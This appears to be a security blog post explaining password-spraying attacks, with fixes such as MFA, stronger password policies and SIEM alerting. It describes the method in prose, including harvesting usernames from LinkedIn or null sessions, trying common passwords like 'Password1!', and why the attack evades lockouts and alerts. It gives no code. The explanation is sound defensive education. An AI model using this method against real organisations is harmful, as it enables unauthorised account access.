A password spray or password spraying attack is one of the most useful items in a penetration testers toolbox. This style of attack is used on almost every single external and internal penetration test. And if penetration testers are using it, you know that means hackers and malicious actors out there are using it as well, so it’s worth understanding what a password spray is and why someone would want to use it. No matter your role, understanding this type of attack can help you become a better network defender, SOC analyst, penetration tester, or security executive, as it will highlight some of the risks associated and some of the challenges detecting and defending against it.
Password Spraying Attack Overview
Traditional password attacks that most people have heard of include brute force attacks and dictionary attacks. In an online attack situation (you can read more about the difference between online and offline password attacks), these styles of password attack consist of an adversary attempting a number of different passwords against a user’s account in an automated fashion, until they successfully authenticate. This provides unauthorized access to whatever network resource or application is being targeted, which is pretty juicy for an attacker.
A lot of times, these styles of attack don’t work well though. People are pretty good at defending against them at this point, using things like account lockouts, IP blacklisting, logging/alerting, etc. by default in most cases. So that’s where a password spraying attack comes in.
By flipping the paradigm of a traditional password attack, a password spray consists of harvesting a list of valid (or hopefully valid) user accounts and then trying a single common password against all of them. Unfortunately, humans are still bad at choosing passwords in many cases, and this type of attack is still very successful with just a few attempts. And even better, attackers and penetration testers can use this type of attack to avoid all of those classic mitigating controls that are in place, like account lockouts and alerts.
How does it work?
Let’s break down how a typical password spraying attack works:
- We need a list of usernames. This can vary in difficulty, but if you’re attacking the external perimeter of an organization, open source intelligence can make this pretty trivial in the age of social media. We might be able to find the username format from an email address on a marketing website (or make educated guesses using standard formats). Then we could try to confirm that username via a username enumeration vulnerability on an Internet-facing application. Using that information, we could then create a script to scrape names from LinkedIn and parse them into the appropriate username format. On internal networks, this could be as easy as asking the organization’s Domain Controller for a list of all users using an anonymous or null session.
- With our crafted user list, we can automate the process of trying a particularly common password for each user. Options like Spring2018, Organization1, or Password1! are usually a good place to start. These can be modified if any information can be uncovered regarding the organization’s applied password policy. There are many different tools or custom scripts that be written to perform this part of the attack, based on what asset or application you are targeting. In most cases, a good intercepting proxy like BurpSuite or a custom curl script will do the trick.
- Based on responses, we can see which sets of credentials successfully authenticated. We can then take those valid credentials and log in to externally facing assets just like any normal corporate user would, gaining access to the VPN, email, or applications.
What are the Advantages of a Password Spray?
For an attacker or penetration tester, this style of attack is incredibly useful and preys on your employees’ inability to pick a strong password and an organization’s inability to enforce a strong password policy or use multi-factor authentication. In addition to these environmental factors, a password spraying attack avoids:
- Account Lockouts – Because you’re trying one password against many accounts and waiting for lockout counters to reset in between attempts, you’ll never lockout an account in most cases.
- IPS/IP Blacklisting – Many times, controls that implement IP blacklisting for logins are only looking at unsuccessful login attempts with the same username parameter to avoid blocking normal application traffic.
- SIEM Alerts – Just like IP Blacklisting, most SIEM technology and SOCs aren’t looking for this type of attack by default. A password spray will avoid password attack detection if it has not been customized to look for this, in most cases.
What’s the Fix?
This is a scenario where you can’t stop someone from performing a password spray on your organization, but you can significantly reduce the chances of success and be alerted when it happens. Some things to consider are:
- Reduce your external attack surface – this almost always applies but it’s a great first step to limit the number of interfaces you have to worry about defending. Have users VPN into the network before accessing any corporate systems, whenever possible. You can also try and make it harder for an attacker to obtain a list of usernames (which is really hard with the amount of information available online) and make sure you’re testing for username enumeration when you undergo regular security assessments.
- Multi-factor authentication – When you’ve got only what is necessary on your perimeter, protect it with MFA! Seriously, use MFA. This can’t be overstated for how important of a control this can be. It is becoming more widely used, easier to implement, and cheaper for organizations.
- Strong Password Policies – 8 characters just isn’t sufficient in most cases. Start the process of increasing your organization’s password policies and use security awareness training to help employees pick a strong password. For Active Directory and employee applications, you can do regular password audits, implement password blacklisting solutions to prevent users from choosing the most common passwords, and increase minimum length requirements.
- Finally, with all these preventative controls in place, you can also up your monitoring game. Make sure your SIEM has alerts set up that can identify these types of attacks by auditing for failed login attempts from a particular host for a set of different users.
Password spraying attacks are still a really common attack vector for gaining access to a corporate network from the Internet or gaining an initial foothold from within an organization. Knowing that these types of attacks are possible is half the battle, but many of the fixes I’ve noted above are really difficult for organization’s to implement, whether it be from a resource or cultural constraint. A lot of times, having a penetration test conducted can be a great to see how susceptible you are to this kind of attack, and the results can be used to help convey risk to executives about the importance of some of these foundational security controls.